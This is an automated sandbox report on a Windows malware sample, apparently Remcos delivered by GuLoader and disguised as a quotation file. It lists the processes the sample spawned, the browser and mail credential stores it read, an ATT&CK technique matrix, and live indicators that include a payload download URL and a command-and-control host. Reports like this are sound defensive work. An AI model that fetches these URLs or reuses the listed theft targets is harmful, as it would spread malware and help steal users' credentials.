                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe "C:\Users\user\Desktop\z1Quotation.scr.exe"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\jcokhfyxinncnfcgtxknzv"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\hhsvynxt"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\pqvxpoqshoxjfvzq"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xadmhfv"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xpsjxjoeplzrro"
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Process created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\gymlnlyltcmojzwgtmnvsm"
                Source: z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968438637.0000000007488000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978936796.0000000007488000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                Source: z1Quotation.scr.exe, 00000082.00000003.35978936796.0000000007488000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988752438.0000000007488000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager"
                Source: z1Quotation.scr.exe, 00000082.00000003.35968794940.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35979025881.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991202437.00000000073F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerO
                Source: z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                Source: C:\Windows\SysWOW64\dxdiag.exe Queries volume information: C:\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_3ea756ac68d34d21\igdlh.cat VolumeInformation
                Source: C:\Windows\SysWOW64\dxdiag.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem23.cat VolumeInformation
                Source: C:\Windows\SysWOW64\dxdiag.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem24.cat VolumeInformation
                Source: C:\Windows\SysWOW64\dxdiag.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem22.cat VolumeInformation
                Source: C:\Windows\SysWOW64\dxdiag.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\oem15.cat VolumeInformation
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 137_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,137_2_0041881C
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 138_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,138_2_004082CD
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeCode function: 0_2_004034D1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034D1
                Source: C:\Windows\SysWOW64\dxdiag.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: Process Memory Space: z1Quotation.scr.exe PID: 1412, type: MEMORYSTR
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite-wal
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite-shm
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; Key opened: HKEY_CURRENT_USER\Software\Paltalk
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; Code function: EntryPoint, ESMTPPassword 138_2_004033F0
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 138_2_00402DB3
                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 138_2_00402DB3
                Source: Yara match; File source: 140.2.z1Quotation.scr.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 140.2.z1Quotation.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 0000008C.00000002.36509511110.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                Source: C:\Users\user\Desktop\z1Quotation.scr.exe; Mutex created: \Sessions\1\BaseNamedObjects\Rmc-ZLUOGZ
                Source: Yara match; File source: Process Memory Space: z1Quotation.scr.exe PID: 1412, type: MEMORYSTR
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 131 Windows Management Instrumentation | 1 LSASS Driver | 1 LSASS Driver | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 11 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | 21 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 2 Obfuscated Files or Information | 1 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | 12 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 2 Software Packing | 2 Credentials in Registry | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 112 Process Injection | 1 DLL Side-Loading | 1 Credentials In Files | 139 System Information Discovery | Distributed Component Object Model | 1 Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Registry Run Keys / Startup Folder | 1 Masquerading | LSA Secrets | 331 Security Software Discovery | SSH | 2 Clipboard Data | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 13 Virtualization/Sandbox Evasion | Cached Domain Credentials | 13 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | 13 Application Layer Protocol | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 112 Process Injection | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Time Based Evasion | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 Time Based Evasion | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                [Behavior graph: ID: 1522580, Sample: z1Quotation.scr.exe, Startdate: 30/09/2024, Architecture: WINDOWS, Score: 100]

                Source | Detection | Scanner | Label
                z1Quotation.scr.exe | 18% | Virustotal |
                z1Quotation.scr.exe | 11% | ReversingLabs |
                z1Quotation.scr.exe | 100% | Joe Sandbox ML |
                Source | Detection | Scanner | Label
                C:\Users\user\AppData\Local\Temp\nsi8284.tmp\System.dll | 0% | ReversingLabs |
                C:\Users\user\AppData\Local\Temp\nsi8284.tmp\nsExec.dll | 0% | ReversingLabs |
                No Antivirus matches
                Source | Detection | Scanner | Label
                telesavers.co.za | 14% | Virustotal |
                geoplugin.net | 0% | Virustotal |
                subddfg.lol | 0% | Virustotal |
                Source | Detection | Scanner | Label
                http://geoplugin.net/json.gpB_ | 3% | Virustotal |
                http://nsis.sf.net/NSIS_ErrorError | 0% | Virustotal |
                http://crl.quovadisglobal.com/qvicag4.crl0 | 0% | Virustotal |
                http://trust.quovadisglobal.com/qvrca.crt0 | 0% | Virustotal |
                http://pki.intel.com/crt/IntelCA7B.crt0 | 0% | Virustotal |
                http://www.imvu.com | 0% | Virustotal |
                http://trust.quovadisglobal.com/qvicag4.crt0 | 0% | Virustotal |
                http://pki.intel.com/crl/IntelCA7B.crl0f | 0% | Virustotal |
                http://geoplugin.net/json.gp | 6% | Virustotal |
                http://www.quovadisglobal.com/repository0 | 0% | Virustotal |
                http://crl.quovadisglobal.com/qvrca.crl0 | 0% | Virustotal |
                http://nsis.sf.net/NSIS_Error | 0% | Virustotal |
                https://www.google.com | 0% | Virustotal |
                http://geoplugin.net/json.gpn.net/json.gp | 0% | Virustotal |
                http://geoplugin.net/ | 0% | Virustotal |
                http://geoplugin.net/json.gpM | 0% | Virustotal |
                https://login.yahoo.com/config/login | 0% | Virustotal |
                https://telesavers.co.za/ | 1% | Virustotal |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                telesavers.co.za | 102.65.21.26 | true | false | | unknown
                geoplugin.net | 178.237.33.50 | true | false | | unknown
                subddfg.lol | 23.106.238.209 | true | true | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://geoplugin.net/json.gp | false | | unknown
                https://telesavers.co.za/FrKSUMZ203.bin | true | | unknown
                                                  unknown
                                                  https://telesavers.co.za/telesavers.co.za5z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmptrue
                                                    unknown
                                                    http://geoplugin.net/json.gpMz1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                    https://telesavers.co.za/Joz1Quotation.scr.exe, 00000082.00000003.33237027260.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmptrue
                                                      unknown
                                                      http://www.quovadis.bm0z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33996272367.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33995869114.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36286467585.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000002.36290061377.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36215218240.0000000002ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://www.google.com/accounts/serviceloginz1Quotation.scr.exefalse
                                                          unknown
                                                          https://login.yahoo.com/config/loginz1Quotation.scr.exefalseunknown
                                                          https://telesavers.co.za/z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968794940.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35959037232.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35979025881.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33236979197.00000000073FC000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35989039555.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121957679.00000000073E0000.00000004.00000020.00020000.00000000.sdmptrueunknown
                                                          http://www.nirsoft.net/z1Quotation.scr.exefalse
                                                            unknown
                                                            https://ocsp.quovadisoffshore.com0z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33996272367.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33995869114.0000000007435000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36286467585.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000002.36290061377.0000000002ACD000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000084.00000003.36215218240.0000000002ACD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://geoplugin.net/json.gpV_0z1Quotation.scr.exe, 00000082.00000003.35958881929.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35991087390.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35968576941.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35961051808.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35121830730.000000000742E000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.34025085580.000000000742C000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35978843989.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35970951043.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35981100178.0000000007431000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.35988865373.0000000007431000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://telesavers.co.za/telesavers.co.zaz1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073F7000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33542108978.00000000073FF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  unknown
                                                                  https://telesavers.co.za/Boz1Quotation.scr.exe, 00000082.00000003.33237027260.00000000073DF000.00000004.00000020.00020000.00000000.sdmp, z1Quotation.scr.exe, 00000082.00000003.33541985946.00000000073DF000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    unknown
                                                                    http://OCSP.intel.com/0dxdiag.exe, 00000084.00000003.36259067577.00000000061E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://www.ebuddy.comz1Quotation.scr.exefalse
                                                                        unknown
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
23.106.238.209 | subddfg.lol | United Kingdom | 7203 | LEASEWEB-USA-SFO-12US | true
102.65.21.26 | telesavers.co.za | South Africa | 328453 | Web-Africa-Networks-ASZA | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1522580
Start date and time: 2024-09-30 12:00:14 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 19m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 145
Number of new started drivers analysed: 2
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: z1Quotation.scr.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@410/33@14/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 98%
                                                                        • Number of executed functions: 177
                                                                        • Number of non-executed functions: 308
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WmiPrvSE.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 52.168.117.173
                                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, clients.config.office.net
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:05:37 | API Interceptor | 9096242x Sleep call for process: z1Quotation.scr.exe modified
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        102.65.21.26X8VbtniLpf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          rSignedApprovedQuotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            178.237.33.50V1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            Invoice and packing list (021)_pdf.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • geoplugin.net/json.gp
                                                                            ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            oi2BC6zhUY.exeGet hashmaliciousRemcosBrowse
                                                                            • geoplugin.net/json.gp
                                                                            Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • geoplugin.net/json.gp
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            telesavers.co.zaX8VbtniLpf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 102.65.21.26
                                                                            geoplugin.netV1ljXRn7Yo.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            Invoice and packing list (021)_pdf.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                            • 178.237.33.50
                                                                            ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            yVhGfho0R4.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
                                                                            oi2BC6zhUY.exeGet hashmaliciousRemcosBrowse
                                                                            • 178.237.33.50
